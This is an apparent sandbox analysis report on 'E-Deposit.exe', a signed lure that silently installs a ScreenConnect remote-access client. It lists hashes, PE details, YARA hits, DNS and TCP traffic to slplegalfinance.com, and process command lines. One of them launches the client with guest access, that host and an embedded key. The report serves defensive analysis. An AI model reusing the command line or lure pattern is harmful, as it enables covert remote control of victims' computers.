                                                                                  SSDEEP:48:L8PhDuRc06WXzuFT5nP979BIsqcq56Adum1Si5zaIdSAYxXV3jzoo7rWAdum1SI6:yhD1zFTXzuph1fdaIdAxJH11
                                                                                  MD5:34A8C52EFBBB37599363A63A30D0E932
                                                                                  SHA1:1ABE2E86C5352B362F58606F927FE267F82A504D
                                                                                  SHA-256:CC1556D554C2917516FB7554BEAF11742A17CF25270298DBCBFC95F180933E5B
                                                                                  SHA-512:7F446DF0540E1661C1DC892B5DAFD65779CF3FE5EAAA3BBB5F2EFC04EA1D44420174A7C819210D41747B32FE6C5BD4D1336EBF8D17EB527FC745BEDF197D84D3
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFC2C1B5F26C92D1A2.TMP, Author: Joe Security
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Temp\~DFC7BCB91DE3EE5AE2.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.427623078135939
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:E-Deposit.exe
                                                                                  File size:5'627'248 bytes
                                                                                  MD5:70d47fa2e078f04400d3d1b236245678
                                                                                  SHA1:987aa3368265fc300b10b4128d8367c3d7a29c6c
                                                                                  SHA256:b0a8d541b650ffff1bb4b3690af389e52b1675212129560dbe33038b1041266b
                                                                                  SHA512:a078ec2aa08f1928b7cef2b3b17e02e5a52860dd684ad798ab8aca0a55d1069f45e27497fabf15c4e932299fe206ed4e49085848a1bc3ae087b13ece36f768e2
                                                                                  SSDEEP:49152:AEEL5cx5xTkYJkGYYpT0+TFiH7efP8Q1yJJ4ZD1F5z97oL1YbGQ+okRPGHpRPqM8:pEs6efPNwJ4t1h0cG5FGJRPxow8O
                                                                                  TLSH:B146E111B3DA95B9D4BF0638D87A82699A74BC044712C7EF53D4BD2D2D32BC05E323A6
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........

                                                                                  File Icon

                                                                                  Icon Hash:90cececece8e8eb0

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x4014ad
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:true
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:9771ee6344923fa220489ab01239bdfd

                                                                                  Authenticode Signature

                                                                                  Signature Valid:true
                                                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                  Signature Validation Error:The operation completed successfully
                                                                                  Error Number:0
                                                                                  Not Before, Not After
                                                                                  • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                                  Subject Chain
                                                                                  • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                  Version:3
                                                                                  Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                  Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                  Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                  Serial:0B9360051BCCF66642998998D5BA97CE

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  call 00007F7A00BA36FAh
                                                                                  jmp 00007F7A00BA31AFh
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push 00000000h
                                                                                  call dword ptr [0040D040h]
                                                                                  push dword ptr [ebp+08h]
                                                                                  call dword ptr [0040D03Ch]
                                                                                  push C0000409h
                                                                                  call dword ptr [0040D044h]
                                                                                  push eax
                                                                                  call dword ptr [0040D048h]
                                                                                  pop ebp
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 00000324h
                                                                                  push 00000017h
                                                                                  call dword ptr [0040D04Ch]
                                                                                  test eax, eax
                                                                                  je 00007F7A00BA3337h
                                                                                  push 00000002h
                                                                                  pop ecx
                                                                                  int 29h
                                                                                  mov dword ptr [004148D8h], eax
                                                                                  mov dword ptr [004148D4h], ecx
                                                                                  mov dword ptr [004148D0h], edx
                                                                                  mov dword ptr [004148CCh], ebx
                                                                                  mov dword ptr [004148C8h], esi
                                                                                  mov dword ptr [004148C4h], edi
                                                                                  mov word ptr [004148F0h], ss
                                                                                  mov word ptr [004148E4h], cs
                                                                                  mov word ptr [004148C0h], ds
                                                                                  mov word ptr [004148BCh], es
                                                                                  mov word ptr [004148B8h], fs
                                                                                  mov word ptr [004148B4h], gs
                                                                                  pushfd
                                                                                  pop dword ptr [004148E8h]
                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                  mov dword ptr [004148DCh], eax
                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                  mov dword ptr [004148E0h], eax
                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                  mov dword ptr [004148ECh], eax
                                                                                  mov eax, dword ptr [ebp-00000324h]
                                                                                  mov dword ptr [00414828h], 00010001h

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 build 21022

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533074.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x17b70
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x160000x5330740x533200d813d73373778ed5b0a4b71b252379ebunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  FILES0x163d40x86000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.3962220149253731
                                                                                  FILES0x9c3d40x1a4600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5111589431762695
                                                                                  FILES0x2409d40x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.4415066442757009
                                                                                  FILES0x25b5d40x2ec318PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9810924530029297
                                                                                  FILES0x5478ec0x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                                  RT_MANIFEST0x548eec0x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143

                                                                                  Imports

                                                                                  DLLImport
                                                                                  mscoree.dllCorBindToRuntimeEx
                                                                                  KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                                  OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States

                                                                                  Network Behavior

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 6, 2025 11:46:17.220957994 CET49731443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:17.221004963 CET44349731185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:17.221077919 CET49731443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:17.759484053 CET49731443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:17.759510040 CET44349731185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:17.759576082 CET44349731185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:19.817991972 CET49732443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:19.818032026 CET44349732185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:19.818095922 CET49732443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:19.820024014 CET49732443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:19.820039988 CET44349732185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:19.820204973 CET44349732185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:23.316339970 CET49733443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:23.316395998 CET44349733185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:23.316478014 CET49733443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:23.319569111 CET49733443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:23.319592953 CET44349733185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:23.319624901 CET44349733185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:28.280692101 CET49737443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:28.280723095 CET44349737185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:28.280828953 CET49737443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:28.283675909 CET49737443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:28.283693075 CET44349737185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:28.283755064 CET44349737185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:35.150012016 CET49741443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:35.150113106 CET44349741185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:35.150213957 CET49741443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:35.152678013 CET49741443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:35.152713060 CET44349741185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:35.152751923 CET44349741185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:45.916002035 CET49742443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:45.916048050 CET44349742185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:45.916134119 CET49742443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:45.918446064 CET49742443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:45.918462038 CET44349742185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:45.918505907 CET44349742185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:59.180828094 CET49743443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:59.180883884 CET44349743185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:59.180955887 CET49743443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:59.182981014 CET49743443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:59.182998896 CET44349743185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:59.183033943 CET44349743185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:47:15.290977955 CET49781443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:47:15.291007042 CET44349781185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:47:15.291098118 CET49781443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:47:15.293442011 CET49781443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:47:15.293452978 CET44349781185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:47:15.293495893 CET44349781185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:47:37.483553886 CET49924443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:47:37.483596087 CET44349924185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:47:37.483666897 CET49924443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:47:37.485764027 CET49924443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:47:37.485780001 CET44349924185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:47:37.485838890 CET44349924185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:48:13.477514029 CET50012443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:48:13.477552891 CET44350012185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:48:13.477628946 CET50012443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:48:13.479921103 CET50012443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:48:13.479933023 CET44350012185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:48:13.479989052 CET44350012185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:48:57.122226000 CET50013443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:48:57.122265100 CET44350013185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:48:57.122335911 CET50013443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:48:57.124819040 CET50013443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:48:57.124835968 CET44350013185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:48:57.124887943 CET44350013185.143.228.176192.168.2.4

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 6, 2025 11:46:17.014406919 CET5871353192.168.2.41.1.1.1
                                                                                  Jan 6, 2025 11:46:17.172060013 CET53587131.1.1.1192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Jan 6, 2025 11:46:17.014406919 CET192.168.2.41.1.1.10xb65cStandard query (0)slplegalfinance.comA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Jan 6, 2025 11:46:17.172060013 CET1.1.1.1192.168.2.40xb65cNo error (0)slplegalfinance.com185.143.228.176A (IP address)IN (0x0001)false

                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:05:46:10
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Users\user\Desktop\E-Deposit.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\E-Deposit.exe"
                                                                                  Imagebase:0xad0000
                                                                                  File size:5'627'248 bytes
                                                                                  MD5 hash:70D47FA2E078F04400D3D1B236245678
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1699705428.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1712436337.0000000007AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1678535852.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:05:46:11
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                                                                                  Imagebase:0xae0000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:05:46:11
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                  Imagebase:0x7ff67e4b0000
                                                                                  File size:69'632 bytes
                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:05:46:11
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 7C96E0C746C692A03058DACF458A9432 C
                                                                                  Imagebase:0xae0000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:05:46:11
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICCC5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5885281 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                  Imagebase:0x2e0000
                                                                                  File size:61'440 bytes
                                                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:05:46:13
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6DF4961B2A2833D6816518D4EE959F34
                                                                                  Imagebase:0xae0000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:05:46:14
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding BF7ECCB9F681B80AAF512F5A86264840 E Global\MSI0000
                                                                                  Imagebase:0xae0000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:05:46:14
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=01fec5eb-3274-44cf-8963-40ccf08671d2&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv"
                                                                                  Imagebase:0xf50000
                                                                                  File size:95'512 bytes
                                                                                  MD5 hash:75B21D04C69128A7230A0998086B61AA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 0%, ReversingLabs
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:05:46:16
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "c767b2ee-2b09-4628-9d93-0df3c46d63ac" "User"
                                                                                  Imagebase:0x6f0000
                                                                                  File size:602'392 bytes
                                                                                  MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000002.3520090259.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 0%, ReversingLabs
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Executed Functions

                                                                                    Function 01787A3B Relevance: 3.9, Strings: 3, Instructions: 184COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1677192141.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1780000_E-Deposit.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #!$K6$7
                                                                                    • API String ID: 0-185628103
                                                                                    • Opcode ID: 4b7560f771ed70c9bba83a9476a66b7efb5c093a001be44bff44e4616fc60646
                                                                                    • Instruction ID: cdbe684a74dbf451e7d0176cfd12e747f3736ef5c0efb3cf286d885b09ffaec0
                                                                                    • Opcode Fuzzy Hash: 4b7560f771ed70c9bba83a9476a66b7efb5c093a001be44bff44e4616fc60646
                                                                                    • Instruction Fuzzy Hash: D85190B43502024BC715AB7DD890A5EBBE7EBC93503508A29E426CB354EF78DD058FD1
                                                                                    Function 0178D540 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1677192141.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1780000_E-Deposit.jbxd
                                                                                    Similarity
